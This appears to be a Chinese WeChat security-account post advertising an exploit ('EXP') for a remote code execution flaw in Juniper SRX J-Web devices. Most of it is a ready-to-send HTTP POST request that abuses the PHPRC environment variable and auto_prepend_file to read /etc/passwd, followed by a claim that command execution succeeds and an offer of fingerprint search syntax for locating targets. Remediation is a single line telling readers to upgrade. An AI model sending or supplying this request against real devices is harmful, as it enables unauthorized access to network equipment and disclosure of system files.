|
现在只对常读和星标的公众号才展示大图推送,建议大家把阿无安全“设为星标”,否则可能看不到了!
0x01 前言
0x02 漏洞影响
影响版本
Juniper SRX系列
0x03 漏洞利用
登录界面
EXP:
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: ip:port
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://ip:port/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 31
auto_prepend_file="/etc/passwd"
命令执行成功!
0x04 修复方案
请升级最新版本。
0x05 下载地址
回复【J-Web】获取指纹语法
往期推荐 · 值得阅看
原文始发于微信公众号(阿无安全):某网络设备RCE漏洞(附EXP)